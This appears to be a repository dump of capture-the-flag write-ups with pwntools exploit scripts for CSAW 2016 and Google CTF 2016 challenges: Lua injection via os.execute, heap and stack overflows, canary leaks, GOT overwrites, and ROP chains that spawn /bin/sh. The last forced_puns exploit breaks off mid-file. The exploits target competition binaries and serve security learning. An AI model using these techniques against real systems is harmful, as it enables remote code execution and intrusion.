├── csaw2016 ├── aul │ ├── README.md │ ├── download.py │ ├── exp.py │ └── file.bin ├── hungman │ ├── README.md │ ├── exp.py │ ├── hungman │ └── libc-2.23.so └── tutorial │ ├── README.md │ ├── exp.py │ ├── libc-2.19.so │ └── tutorial ├── googlectf2016 ├── audio_visual_receiver │ ├── README.md │ ├── audio_visual_receiver_code │ └── solve.py ├── forced_puns │ ├── README.md │ ├── app │ │ └── forced-puns │ ├── exp.py │ └── lib │ │ ├── aarch64-linux-gnu │ │ └── libc.so.6 │ │ └── ld-linux-aarch64.so.1 └── opabina_regalis │ ├── README.md │ ├── downgrade_attack.py │ ├── input_validation.py │ ├── proto.proto │ ├── redirect.py │ ├── ssl_stripping.py │ └── token_fetch.py ├── hitcon2016quals └── shellingfolder │ ├── README.md │ ├── exp.py │ ├── libc.so.6_375198810bb39e6593a968fcbcf6556789026743 │ └── shellingfolder_42848afa70a13434679fac53a471239255753260 ├── ndh2016 └── night_deamonic_heap │ ├── exp.py │ └── role_gaming ├── sctf2016 └── pwn2 │ ├── pwn2 │ ├── pwn2_bf.py │ ├── pwn2_getn.py │ └── pwn2_leak.py └── seccon2017 ├── election ├── .gdb_history ├── election-9724a8d0a6c9ccb131200ec96752c61c0e6734cd9e1bb7b1958f8c88c0bd78fa.zip └── exp.py └── printfmachine ├── .gdb_history ├── add_debug.py ├── code.fs ├── convert.py ├── convert2.py ├── convert3.py ├── default.fs ├── fsmachine ├── out.fs ├── printf_machine-05943cfba938e4ab7f52f096e35f6197c9308a6c56c83d75812adebe21671f9a.zip ├── solve.py └── solve_z3.py /csaw2016/aul/README.md: -------------------------------------------------------------------------------- 1 | # Aul 2 | 3 | There was no binary given with this challenge. 4 | I tried to connect to the service and after playing for some seconds I found 5 | out that with the `help` command a lot of "garbage" was sent out by the server. 6 | I used a simple python script to extract the binary data and put it in a file. 7 | 8 | Looking quickly at it, it looks like the code of the server itself, but `file` 9 | is not able to say anything, although `hexdump` was more helpful. 10 | ``` 11 | 00000000 4c 75 61 53 00 19 93 0d 0d 0a 1a 0d 0a 04 08 04 |LuaS............| 12 | 00000010 08 08 78 56 00 00 00 00 00 00 00 00 00 00 00 28 |..xV...........(| 13 | 00000020 77 40 01 00 00 00 00 00 00 00 00 00 00 02 02 1f |w@..............| 14 | 00000030 00 00 00 2c 00 00 00 08 00 00 80 2c 40 00 00 08 |...,.......,@...| 15 | 00000040 00 80 80 2c 80 00 00 08 00 00 81 2c c0 00 00 08 |...,.......,....| 16 | 00000050 00 80 81 2c 00 01 00 08 00 00 82 2c 40 01 00 08 |...,.......,@...| 17 | 00000060 00 80 82 2c 80 01 00 08 00 00 83 2c c0 01 00 08 |...,.......,....| 18 | 00000070 00 80 83 2c 00 02 00 08 00 00 84 08 80 c2 84 2c |...,...........,| 19 | 00000080 40 02 00 08 00 80 85 2c 80 02 00 08 00 00 86 2c |@......,.......,| 20 | 00000090 c0 02 00 08 00 80 86 06 80 43 00 41 c0 03 00 24 |.........C.A...$| 21 | 000000a0 40 00 01 06 40 43 00 24 40 80 00 26 00 80 00 10 |@...@C.$@..&....| 22 | 000000b0 00 00 00 04 0b 6d 61 6b 65 5f 62 6f 61 72 64 04 |.....make_board.| 23 | 000000c0 0f 70 6f 70 75 6c 61 74 65 5f 62 6f 61 72 64 04 |.populate_board.| 24 | 000000d0 0f 62 6f 61 72 64 5f 74 6f 73 74 72 69 6e 67 04 |.board_tostring.| 25 | ``` 26 | 27 | I tried to compile a lua program myself to check if the first bytes were 28 | similar and they were, except for an initial byte `\x1b` and a different letter 29 | after the `Lua` signature (that changes with every version of Lua). 30 | 31 | I added the first byte and looked on the Internet for a Lua decompiler, finding 32 | `unluac` (https://sourceforge.net/projects/unluac/). It didn't work out of the 33 | box though, complaining that the signature wasn't a valid Lua one. 34 | 35 | Indeed, after carefully comparing the dump of a program I compiled myself and 36 | the one downloaded from the server, I found out that each `\x0a` was prefixed 37 | by a `\x0d`. Done also this step, I was able to decompile Lua with `unluac` and 38 | get the source code. 39 | 40 | In particular, this is the output of the `run_step` function: 41 | ```lua 42 | function run_step(A0_41) 43 | local L1_42, L2_43 44 | L1_42 = readline 45 | L1_42 = L1_42() 46 | L2_43 = string 47 | L2_43 = L2_43.len 48 | L2_43 = L2_43(L1_42) 49 | if L2_43 == 0 then 50 | L2_43 = exit 51 | L2_43() 52 | L2_43 = nil 53 | return L2_43 54 | end 55 | L2_43 = string 56 | L2_43 = L2_43.find 57 | L2_43 = L2_43(L1_42, "function") 58 | if L2_43 then 59 | L2_43 = nil 60 | return L2_43 61 | end 62 | L2_43 = string 63 | L2_43 = L2_43.find 64 | L2_43 = L2_43(L1_42, "print") 65 | if L2_43 then 66 | L2_43 = nil 67 | return L2_43 68 | end 69 | L2_43 = load 70 | L2_43 = L2_43("return " .. L1_42) 71 | L2_43 = L2_43() 72 | if L2_43 == nil then 73 | return nil 74 | end 75 | return L2_43(A0_41) 76 | end 77 | ``` 78 | 79 | The input command is used to find a function with that name, with `return 80 | function_name`, that is immediately called. I thought that I could use it to 81 | execute a "system" function and get a shell and it worked :) (except the 82 | function is called `os.execute` and not `system`). 83 | -------------------------------------------------------------------------------- /csaw2016/aul/download.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | from pwn import * 4 | 5 | p = remote('pwn.chal.csaw.io', 8001) 6 | p.recvline() 7 | table = p.recvlines(8) 8 | p.sendline('help') 9 | 10 | p.recvline() 11 | t = p.recvuntil(table) 12 | t = '\x1b' + t[:t.rfind('Didn\'t understand')] 13 | t = t.replace('\x0d\x0a', '\x0a') 14 | open('file.bin', 'wb').write(t) 15 | -------------------------------------------------------------------------------- /csaw2016/aul/exp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | from pwn import * 4 | 5 | p = remote('pwn.chal.csaw.io', 8001) 6 | p.recvline() 7 | table = p.recvlines(8) 8 | p.sendline("os.execute('/bin/sh')") 9 | p.interactive() 10 | -------------------------------------------------------------------------------- /csaw2016/aul/file.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ret2libc/ctfs/6ead9375ec34a7684aca97f1de7d609296e7595a/csaw2016/aul/file.bin -------------------------------------------------------------------------------- /csaw2016/hungman/README.md: -------------------------------------------------------------------------------- 1 | # hungman 2 | 3 | I tried to play a little bit with the service and it looked like a hangman game 4 | with random data. Luckily, while I was playing, I noticed that if the name 5 | inserted at the start of the game was long enough, all the letters were in the 6 | hidden string and in this way I was always able to win just by trying all the 7 | letters. 8 | 9 | After decompiling the binary I looked mainly at two functions: the one executed 10 | at the start of the game, to create the player structure, and the one that 11 | handles the game and in particular the "change name" functionality, executed 12 | after winning the game. 13 | 14 | ```C 15 | struct player *__cdecl get_player() 16 | { 17 | char *v0; // ST10_8@3 18 | player *pl; // ST18_8@3 19 | struct player *result; // rax@3 20 | __int64 v3; // rbx@3 21 | int len_name; // [sp+Ch] [bp-124h]@1 22 | char *v5; // [sp+10h] [bp-120h]@1 23 | char name[248]; // [sp+20h] [bp-110h]@1 24 | __int64 v7; // [sp+118h] [bp-18h]@1 25 | 26 | v7 = *MK_FP(__FS__, 40LL); 27 | write(1, "What's your name?\n", 0x12uLL); 28 | memset(name, 0, 248uLL); 29 | len_name = read(0, name, 247uLL); 30 | v5 = strchr(name, '\n'); 31 | if ( v5 ) 32 | *v5 = 0; 33 | v0 = (char *)malloc(len_name); 34 | pl = (player *)malloc(0x80uLL); 35 | memset(pl, 0, 0x80uLL); 36 | pl->name = v0; 37 | pl->len_name = len_name; 38 | memcpy(pl->name, name, len_name); 39 | result = pl; 40 | v3 = *MK_FP(__FS__, 40LL) ^ v7; 41 | return result; 42 | } 43 | ``` 44 | ```C 45 | ... 46 | puts("High score! change name?"); 47 | __isoc99_scanf(" %c", &v2.choice); 48 | if ( v2.choice == 'y' ) 49 | { 50 | newname = malloc(248uLL); 51 | memset(newname, 0, 248uLL); 52 | len_newname = read(0, newname, 248uLL); 53 | pl->len_name = len_newname; 54 | v11 = strchr((const char *)newname, '\n'); 55 | if ( v11 ) 56 | *v11 = 0; 57 | memcpy(pl->name, newname, len_newname); 58 | free(newname); 59 | } 60 | snprintf(high_player_str, 0x200uLL, "Highest player: %s", pl->name); 61 | highscore = pl->score; 62 | ... 63 | ``` 64 | 65 | Indeed, the vulnerability was there, when changing the name player. The new 66 | name is copied in the buffer of the old name, though without reallocating the 67 | space. So if the new name is longer than the old one, you can overwrite 68 | something on the heap. 69 | 70 | With gdb I tried to see what is on the heap after the name, looking for 71 | something interesting to overwrite. 72 | ``` 73 | 0x15a5010: 0x4141414141414141 0x4141414141414141 <- name 74 | 0x15a5020: 0x4141414141414141 0x0000414141414141 75 | 0x15a5030: 0x0000000000000000 0x0000000000000091 76 | 0x15a5040: 0x00000041000000d9 0x00000000015a5010 <- player struct 77 | 0x15a5050: 0x0000000000000000 0x0101000101010100 78 | 0x15a5060: 0x0100010101010101 0x0000000000000001 79 | 0x15a5070: 0x0000000000000000 0x0000000000000000 80 | 0x15a5080: 0x0000000000000000 0x0000000000000000 81 | ``` 82 | 83 | Inside the player structure there is a pointer to the name that looks quite good. 84 | By overwriting it, the next "change name" would try to write at the overwritten 85 | address, providing me a write primitive. At this point I just have to change 86 | the right .got.plt entry to execute the `system` function with `/bin/sh` as 87 | first argument. After a while it looked like `strchr` was a good candidate. 88 | 89 | At last, I needed an info leak to bypass ASLR, but that was quite easy to find 90 | because when changing the player name pointer, the pointed string was printed 91 | on stdout, giving me the address of the `strchr` function. 92 | 93 | In summary: 94 | * use an initial player name longer than 25 95 | * win the game by using all the letters 96 | * change the player name to overwrite the player name pointer inside the 97 | structure with the address of the `strchr` got.plt entry 98 | * get the address of `strchr` to bypass ASLR 99 | * win again the game 100 | * change the player name again. This time the new name is written to the 101 | `strchr` got.plt entry. Of course, I want to replace this entry with the 102 | address of `system`. 103 | * now I just have to make the program execute `strchr`, to trigger `system`. 104 | To do this I can just win again the game and change the name with `/bin/sh`. 105 | This string is passed to `strchr`/`system`, giving me the shell. 106 | -------------------------------------------------------------------------------- /csaw2016/hungman/exp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | from pwn import * 4 | import sys 5 | import time 6 | 7 | is_remote = len(sys.argv) > 1 8 | if is_remote: 9 | p = remote('pwn.chal.csaw.io', 8003) 10 | libc_base = None 11 | free_sss = 0 12 | free_offset = 0x00083a70 13 | system_offset = 0x45380 14 | memset_offset = 0x0008e780 15 | strchr_offset = 0x00089050+ 0x30 16 | else: 17 | p = process('./hungman') 18 | # gdb.attach(p, ''' 19 | # break *0x0000000000400EC4 20 | # continue 21 | # ''') 22 | free_sss = 0 23 | memset_offset = 0x0008c4b0 24 | free_offset = 0x00082d00 25 | system_offset = 0x00046590 26 | strchr_offset = 0x00086d10 + 0x30 27 | libc_base = 0x00007ffff7c29000 28 | 29 | p.recvuntil('your name?\n') 30 | p.sendline('A'*30) 31 | time.sleep(0.7) 32 | print p.recvline() 33 | 34 | for i in string.ascii_lowercase: 35 | t = p.recvline() 36 | print t 37 | if 'change name?' in t: 38 | break 39 | 40 | p.sendline(i) 41 | time.sleep(0.7) 42 | 43 | free_addr = 0x0000000000602018 44 | memset_got = 0x0000000000602050 45 | strchr_got = 0x00602038 46 | p.sendline('y') 47 | time.sleep(0.7) 48 | p.sendline('B'*32 + p64(0) + p64(0x91) + p32(0x52) + p32(0xc9) + p64(strchr_got)) 49 | time.sleep(0.7) 50 | t = p.recvuntil('Continue? ') 51 | t = t[t.index(':')+2:] 52 | t = t[:t.index('score')-1] 53 | t = '\x00' * free_sss + t 54 | t = t.ljust(8, '\x00') 55 | strchr_addr = u64(t) 56 | print 'strchr = %#x' % (strchr_addr,) 57 | libc_base = strchr_addr - strchr_offset 58 | 59 | system_addr = libc_base + system_offset 60 | free_addr = libc_base + free_offset 61 | memset_addr = libc_base + memset_offset 62 | print '[+] libc @ %#x' % (libc_base,) 63 | print '[+] free @ %#x' % (free_addr,) 64 | print '[+] memset @ %#x' % (memset_addr,) 65 | print '[+] system @ %#x' % (system_addr,) 66 | 67 | p.sendline('y') 68 | time.sleep(0.7) 69 | 70 | for i in string.ascii_lowercase: 71 | t = p.recvline() 72 | print t 73 | if 'change name?' in t: 74 | break 75 | 76 | p.sendline(i) 77 | time.sleep(0.7) 78 | 79 | p.sendline('y') 80 | time.sleep(0.7) 81 | p.send(p64(system_addr)) 82 | time.sleep(0.7) 83 | p.recvuntil('Continue? ') 84 | p.sendline('y') 85 | time.sleep(0.7) 86 | 87 | for i in string.ascii_lowercase: 88 | t = p.recvline() 89 | print t 90 | if 'change name?' in t: 91 | break 92 | 93 | p.sendline(i) 94 | time.sleep(0.7) 95 | 96 | p.send('y') 97 | time.sleep(0.7) 98 | p.sendline('/bin/sh') 99 | time.sleep(0.7) 100 | 101 | p.interactive() 102 | -------------------------------------------------------------------------------- /csaw2016/hungman/hungman: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ret2libc/ctfs/6ead9375ec34a7684aca97f1de7d609296e7595a/csaw2016/hungman/hungman -------------------------------------------------------------------------------- /csaw2016/hungman/libc-2.23.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ret2libc/ctfs/6ead9375ec34a7684aca97f1de7d609296e7595a/csaw2016/hungman/libc-2.23.so -------------------------------------------------------------------------------- /csaw2016/tutorial/README.md: -------------------------------------------------------------------------------- 1 | # Tutorial 2 | 3 | The vulnerability in this binary is in plain sight. 4 | The function number 1, `Manual`, is useful to have a reference inside the libc, 5 | given together with the service, while the function number 2, `Practice`, 6 | contains a buffer overflow on the stack. 7 | 8 | Let's get some info about the service: 9 | ```sh 10 | $ file ./tutorial 11 | ./tutorial: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=01e9b94153bb138f2dda5b5b9c490da7c255c68d, not stripped 12 | 13 | $ checksec ./tutorial 14 | Arch: amd64-64-little 15 | RELRO: Partial RELRO 16 | Stack: Canary found 17 | NX: NX enabled 18 | PIE: No PIE 19 | ``` 20 | 21 | So it seems like we have to do ret-to-libc/ROP and to bypass the canary. ASLR, 22 | even if enabled on the server, is not a problem because the service implement 23 | the socket/accept/fork itself and doesn't re-randomize on each fork, so the 24 | addresses are always the same and they can be seen with the `Manual` function 25 | that can leak an address inside the libc. 26 | 27 | By decompiling the function related to the `Practice` functionality we get: 28 | ```C 29 | __int64 __fastcall func2(int a1) 30 | { 31 | char s[312]; // [sp+10h] [bp-140h]@1 32 | __int64 v3; // [sp+148h] [bp-8h]@1 33 | 34 | v3 = *MK_FP(__FS__, 40LL); 35 | bzero(s, 300); 36 | write(a1, "Time to test your exploit...\n", 0x1DuLL); 37 | write(a1, ">", 1); 38 | read(a1, s, 460); 39 | write(a1, s, 324); 40 | return *MK_FP(__FS__, 40LL) ^ v3; 41 | } 42 | ``` 43 | 44 | Not only we have a stack-based buffer overflow, but there is also a `write` 45 | function that always prints 324 bytes, including the canary value. 46 | 47 | The exploit should: 48 | * get the address inside the libc with the `Manual` function 49 | * use `Practice` to leak the canary 50 | * use `Practice` again to pass the canary check and overwrite the return address 51 | * enjoy 52 | 53 | We can't directly return to the system function because we have to load in 54 | `rdi` the address of the string `/bin/sh`. Moreover, the server communicates 55 | with the client through a socket, not with stdin/stdout, so we must redirect 56 | the socket to stdin/stdout to receive and send commands. The file descriptor 57 | number of the client socket can be guessed and it was 4 as expected. 58 | -------------------------------------------------------------------------------- /csaw2016/tutorial/exp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | from pwn import * 4 | from struct import pack 5 | 6 | p = remote('pwn.chal.csaw.io', 8002) 7 | 8 | p.recvuntil('>') 9 | p.sendline('1') 10 | t = p.recvline() 11 | addr = int(t[len('Reference:'):], 16) 12 | libc_base = addr - 0x6f860 13 | print '[+] addr = %#x' % (addr,) 14 | print '[+] libc_base @ %#x' % (libc_base,) 15 | p.recvuntil('>') 16 | p.sendline('2') 17 | p.recvuntil('>') 18 | p.sendline('A'*311) 19 | t = p.recvuntil('>') 20 | t = t[312:t.index('-Tutorial')] 21 | canary = u64(t[:8]) 22 | print '[+] canary = %#x' % (canary,) 23 | 24 | p.sendline('2') 25 | p.recvuntil('>') 26 | 27 | system_addr = libc_base + 0x00046590 28 | binsh_addr = libc_base + 0x0017c8c3 29 | dup2_addr = libc_base + 0x000ebe90 30 | poppop = libc_base + 0x000000000003b8d2 31 | pop_rdi = libc_base + 0x22b9a 32 | pop_rsi = libc_base + 0x24885 33 | 34 | payload = '' 35 | payload += p64(pop_rdi) 36 | payload += p64(4) 37 | payload += p64(pop_rsi) 38 | payload += p64(0) 39 | payload += p64(dup2_addr) 40 | payload += p64(pop_rsi) 41 | payload += p64(1) 42 | payload += p64(dup2_addr) 43 | payload += p64(pop_rsi) 44 | payload += p64(2) 45 | payload += p64(dup2_addr) 46 | payload += p64(pop_rdi) 47 | payload += p64(binsh_addr) 48 | payload += p64(system_addr) 49 | payload += p64(0x4242424242424242) 50 | 51 | p.sendline(cyclic(312) + p64(canary) + 'A'*8 + payload) 52 | p.sendline('ls') 53 | 54 | p.interactive() 55 | -------------------------------------------------------------------------------- /csaw2016/tutorial/libc-2.19.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ret2libc/ctfs/6ead9375ec34a7684aca97f1de7d609296e7595a/csaw2016/tutorial/libc-2.19.so -------------------------------------------------------------------------------- /csaw2016/tutorial/tutorial: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ret2libc/ctfs/6ead9375ec34a7684aca97f1de7d609296e7595a/csaw2016/tutorial/tutorial -------------------------------------------------------------------------------- /googlectf2016/audio_visual_receiver/README.md: -------------------------------------------------------------------------------- 1 | # Audio visual receiver 2 | 3 | I worked on this challenge with @hanyone and @castor91, but at the end @rpaleari 4 | solved it with the old but gold (smart) brute force. 5 | 6 | The program is very simple: it has 6 functions named `up`, `down`, `left`, 7 | `right`, `a`, `b` that change in some ways a global `state` variable and a 8 | `check` one. Moreover, the `a` function is the one that outputs the final flag. 9 | 10 | The binary asks for one character at a time, calling `up` if the char is 'u', 11 | `down` if the char is 'd' and so on. On each inserted char the value of the 12 | `state` variable is inserted in a global buffer. That's the same buffer that is 13 | XORed with the encrypted flag. So we just need to find the right sequence of 14 | functions that changes the state in the right way. 15 | 16 | Let's see what those functions look like: 17 | ```python 18 | def up(state, check, pos, cross_pos): 19 | check ^= state 20 | buffer[pos] = state 21 | pos = (pos + 1) % 33 22 | state *= 3 # each function changes the state in a different way 23 | return (state, check, pos, cross_pos) 24 | 25 | ... 26 | 27 | def a(state, check, pos, cross_pos): 28 | check ^= state 29 | buffer[pos] = state 30 | pos = (pos + 1) % 33 31 | state = (state * 16) | (state >> 4) 32 | if cross[cross_pos] == check: 33 | check = 0 34 | cross_pos += 1 35 | if pos > 29: 36 | return print_flag() 37 | ``` 38 | 39 | First thing I thought was to use Z3. How to write the right constraints? We can 40 | think about it as an array of `check` variables and an array of `state` 41 | variables that represent the check/state variable at the i-th char. 42 | 43 | `check` changes (almost) always in the same way: 44 | ``` 45 | xor_check = check[i] == check[i - 1] ^ state[i - 1] 46 | ``` 47 | Instead `state` can be changed in 6 different ways, depending on the character 48 | you write (u, d, l, r, a, b): 49 | ``` 50 | state[i] == (state[i-1] * 3) # up 51 | state[i] == (state[i-1] >> 1) * 8) - (state[i-1] >> 1) # down 52 | state[i] == (state[i-1] * 2) # left 53 | state[i] == (state[i-1] >> 3)) | (state[i-1]*32) # right 54 | state[i] == (state[i-1] * 16) | (state[i-1] >> 4) # a 55 | state[i] == ~(state[i-1]) # b 56 | ``` 57 | `cross_ptr` always remains the same as the previous value, except in some cases 58 | when you press 'a', in particular when the check `cross[cross_pos] == check` is 59 | satisfied. 60 | 61 | Notice that `state[i] ^ flag[i]` should give us our real flag, so we can add 62 | some constraints to make this value printable and also specify that the first 63 | four chars have to be "CTF{" and the last one "}". We can also specify that the 64 | last function to be executed has to be 'a', by specifying what should be the 65 | value of `state[len(flag)]`. 66 | 67 | At this point I ran my script expecting to find the flag soon, but I had many 68 | problems... I spent a lot of time trying to debug it, giving up after a while. 69 | Luckily another member of our team was able to solve the chal by bruteforcing. 70 | 71 | After the competition I've chosen to look again at my approach and I've 72 | rewritten and rechecked all constraints again, but still nothing. Only after a 73 | while I have realized what a big mistake I made... Looking at the disassembly of the 74 | functions you can see that many of them are using the SHR instruction, which is 75 | a *logical shift to the right*. Python and z3 use, instead, the *arithmetical 76 | right shift*. 77 | 78 | Indeed, fixing my constraints (and my python script) to use the logical shift, 79 | I was able to get the flag quickly. 80 | -------------------------------------------------------------------------------- /googlectf2016/audio_visual_receiver/audio_visual_receiver_code: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ret2libc/ctfs/6ead9375ec34a7684aca97f1de7d609296e7595a/googlectf2016/audio_visual_receiver/audio_visual_receiver_code -------------------------------------------------------------------------------- /googlectf2016/audio_visual_receiver/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | from z3 import * 4 | import sys 5 | import string 6 | import struct 7 | 8 | flag = map(lambda x: struct.unpack('>n if val >= 0 else (val+0x100000000)>>n 12 | def get_seq(buf): 13 | out = '' 14 | for i in range(1, len(flag) + 1): 15 | sn = buf[i] 16 | sp = buf[i-1] 17 | if sn == bb(3 * sp): 18 | out += 'u' 19 | elif sn == bb(bb((rshift(sp, 1)) * 8) - (rshift(sp, 1))): 20 | out += 'd' 21 | elif sn == bb(sp * 2): 22 | out += 'l' 23 | elif sn == bb((rshift(sp, 3)) | bb((sp * 32))): 24 | out += 'r' 25 | elif sn == bb(~sp): 26 | out += 'b' 27 | elif sn == bb((sp * 16)) | (rshift(sp, 4)): 28 | out += 'a' 29 | return out 30 | 31 | s = Solver() 32 | 33 | checks = [BitVec('check%d' % i, 8) for i in range(len(flag) + 1)] 34 | state = [BitVec('state%d' % i, 8) for i in range(len(flag) + 1)] 35 | cross_ptr = [Int('cross_ptr%d' % i) for i in range(len(flag) + 1)] 36 | 37 | def cross_ptr_check(i): 38 | return Or( 39 | And((checks[i-1] ^ state[i-1]) == 0x25, cross_ptr[i-1] == 0), 40 | And((checks[i-1] ^ state[i-1]) == 0x68, cross_ptr[i-1] == 1), 41 | And((checks[i-1] ^ state[i-1]) == 0xef, cross_ptr[i-1] == 2), 42 | And((checks[i-1] ^ state[i-1]) == 0x00, cross_ptr[i-1] >= 3), 43 | ) 44 | 45 | # initial state 46 | s.add(checks[0] == 0) 47 | s.add(state[0] == 5) 48 | s.add(cross_ptr[0] == 0) 49 | 50 | # printable flag 51 | for i in range(0, len(flag)): 52 | s.add((state[i] ^ flag[i]) >= 0x20) 53 | s.add((state[i] ^ flag[i]) <= 0x7e) 54 | 55 | for i in range(1, len(flag) + 1): 56 | xor_check = (checks[i] == checks[i-1] ^ state[i-1]) 57 | a_change_state = (state[i] == (state[i-1] * 16) | LShR(state[i-1], 4)) 58 | 59 | s.add(Or( 60 | And(xor_check, state[i] == (state[i-1] * 3), cross_ptr[i] == cross_ptr[i-1]), # up 61 | And(xor_check, state[i] == (LShR(state[i-1], 1) * 8) - (LShR(state[i-1], 1)), cross_ptr[i] == cross_ptr[i-1]), # down 62 | And(xor_check, state[i] == (state[i-1] * 2), cross_ptr[i] == cross_ptr[i-1]), # left 63 | And(xor_check, state[i] == (LShR(state[i-1], 3)) | (state[i-1]*32), cross_ptr[i] == cross_ptr[i-1]), # right 64 | And(xor_check, state[i] == ~(state[i-1]), cross_ptr[i] == cross_ptr[i-1]), # b 65 | Or( 66 | And(cross_ptr_check(i), checks[i] == 0, cross_ptr[i] == cross_ptr[i-1] + 1, a_change_state), # a 1 67 | And(Not(cross_ptr_check(i)), xor_check, a_change_state, cross_ptr[i] == cross_ptr[i-1]) # a 2 68 | ) 69 | )) 70 | 71 | s.add(state[0] ^ flag[0] == ord('C')) 72 | s.add(state[1] ^ flag[1] == ord('T')) 73 | s.add(state[2] ^ flag[2] == ord('F')) 74 | s.add(state[3] ^ flag[3] == ord('{')) 75 | s.add(state[len(flag)-1] ^ flag[len(flag)-1] == ord('}')) 76 | 77 | # force the last char to be 'a' 78 | s.add(checks[len(flag)] == 0) 79 | s.add(state[len(flag)] == (state[len(flag)-1] * 16) | LShR(state[len(flag)-1], 4)) 80 | s.add(cross_ptr_check(len(flag))) 81 | 82 | print s.check() 83 | while s.check() == sat: 84 | buf = [int(str(s.model()[state[i]])) for i in range(len(flag) + 1)] 85 | seq = get_seq(buf) 86 | f = [i ^ j for i, j in zip(buf, flag)] 87 | print ''.join(map(chr, f)), seq 88 | 89 | block = [] 90 | for i in range(len(flag)): 91 | block.append(state[i] ^ flag[i] != f[i]) 92 | 93 | s.add(Or(block)) 94 | -------------------------------------------------------------------------------- /googlectf2016/forced_puns/README.md: -------------------------------------------------------------------------------- 1 | # Forced Puns 2 | 3 | Let's do a `file` as a first thing: 4 | ```bash 5 | $ file ./app/forced-puns 6 | ./app/forced-puns: ELF 64-bit LSB shared object, ARM aarch64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 3.7.0, BuildID[sha1]=a677e5ead33f8ac9d3948e8157cdcfa39b3f9701, not stripped 7 | ``` 8 | 9 | Aarch64, never seen its assembly before, but there's always a first time. 10 | Let's load it with r2. 11 | 12 | ``` 13 | $ r2 -AA ./app/forced-puns 14 | 15 | [0x00000e20]> e asm.emu=true 16 | [0x00000e20]> e asm.emustr=true 17 | [0x00000e20]> e asm.describe=true # this was really helpful for me to have an idea of what instructions do 18 | 19 | [0x00000e20]> s main 20 | ``` 21 | 22 | I spent a lot of time trying to run the binary. At the end I used 23 | `qemu-aarch64-static` on a Debian vagrant box, attaching gdb to do some 24 | debugging during the exploitation. 25 | 26 | Playing with the binary a little bit, I noticed that there was a buffer overflow 27 | when creating a new entry with a name longer than 232 bytes. 28 | 29 | ``` 30 | $ qemu-aarch64-static -g 12345 -E LD_PRELOAD=./lib/aarch64-linux-gnu/libc.so.6 -L ./lib ./app/forced-puns 31 | $ gdb-multiarch ./app/forced-puns 32 | > target remote localhost:12345 33 | > c 34 | ``` 35 | 36 | The segfault is happening in the function `end_of_entry`. Thanks to this 37 | function I was able to understand a little bit the structure allocated on the 38 | heap, that was something like this: 39 | 40 | ``` 41 | // size of the structure is 256 42 | struct entry { 43 | char *large; 44 | long small; 45 | struct entry *next; 46 | char name[232]; 47 | } 48 | ``` 49 | 50 | It seems like `end_of_entry` segfaults because my input ends up in the `next` field 51 | of the next entry I was going to allocate. That function is called everytime 52 | you set the name of a new entry to know the place the input will be copied to. 53 | So if I can put in the `next` field the address of the printf got (or any 54 | other function) I can execute the code I want. 55 | 56 | But first we should get some leaks, because ASLR is enabled and the binary is 57 | PIE. Setting the `large` field of an entry and printing it allows you to get the 58 | address of a chunk of memory in the heap. Moreover when you print an entry, the 59 | small value is printed as "%s" and this allows you to leak other addresses. I 60 | used the overflow in the name to overwrite the `small` field of the next entry, 61 | so that I could get the leak when printing the entries. 62 | 63 | But how to know where the binary was loaded? Looking at the heap I saw a pointer 64 | to `end_of_entry`, that I used to get a leak of the binary address and, after 65 | that, I used the got entries in the binary to leak addresses of the libc. 66 | 67 | At this point I had every address I wanted, I just needed to find a function 68 | pointer to overwrite. At first I tried to overflow something in .got.plt, but I 69 | realized I couldn't do that because some requirements were needed in order for 70 | the overwrite to work as expected. This is more or less what `end_of_entry` does 71 | and how it's used: 72 | ``` 73 | struct entry *end_of_entry(struct entry *root) { 74 | while (root->next) { 75 | root = root->next; 76 | } 77 | return root; 78 | } 79 | 80 | struct entry *p = end_of_entry(root_ptr); 81 | strcpy(p->name, input); 82 | ``` 83 | 84 | The idea was to to overwrite the `next` field of an entry in such a way that 85 | `end_of_entry` would return the value where I wanted to overwrite (minus 0x18, 86 | the offset of the field name in the structure `entry`). In order for this to 87 | work, there has to be a 0 in the qword just before the address I want to 88 | overwrite, so that it will be interpreted as the `next` field of the entry and 89 | the fake entry would be considered the last one. So I couldn't really write 90 | everywhere... 91 | 92 | I tried to overwrite the `end_of_entry` pointer at the start of the heap, but 93 | because of some differences in the memory layout between my local environment 94 | and the one on the server I wasn't able to solve the challenge in this way. 95 | 96 | After a while I found a pointer to a pointer to the `end_of_entry` function (in 97 | the .got) and luckily it was preceeded by a 0. I then use my write primitive to 98 | put in the bss the address of the system (and the address of the bss where i put 99 | the address of the system). Now, whenever the program calls `end_of_entry` it 100 | would instead call system. Last thing I needed to do was to make root points to 101 | the `/bin/sh` string, but it was quite easy at this point to overwrite the first 102 | bytes of the first entry in the heap to insert the string. 103 | 104 | You can find the full exploit in exp.py. 105 | 106 | 107 | 108 | As a side note, r2 was able to get the name of the library functions called in 109 | the binary, while IDA didn't. :P 110 | -------------------------------------------------------------------------------- /googlectf2016/forced_puns/app/forced-puns: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ret2libc/ctfs/6ead9375ec34a7684aca97f1de7d609296e7595a/googlectf2016/forced_puns/app/forced-puns -------------------------------------------------------------------------------- /googlectf2016/forced_puns/exp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | import sys, socket, telnetlib, ssl, time 4 | import random 5 | from struct import * 6 | 7 | def recvuntil(t): 8 | data = '' 9 | while not data.endswith(t): 10 | tmp = s.recv(1) 11 | if not tmp: break 12 | data += tmp 13 | 14 | return data 15 | 16 | def interactive(): 17 | print '[+] Interactive shell' 18 | t = telnetlib.Telnet() 19 | t.sock = s 20 | t.interact() 21 | 22 | def p32(x): return pack(' ') 37 | s.send('1\n') 38 | recvuntil('--> ') 39 | s.send(name + '\n') 40 | 41 | def add_entry(): 42 | 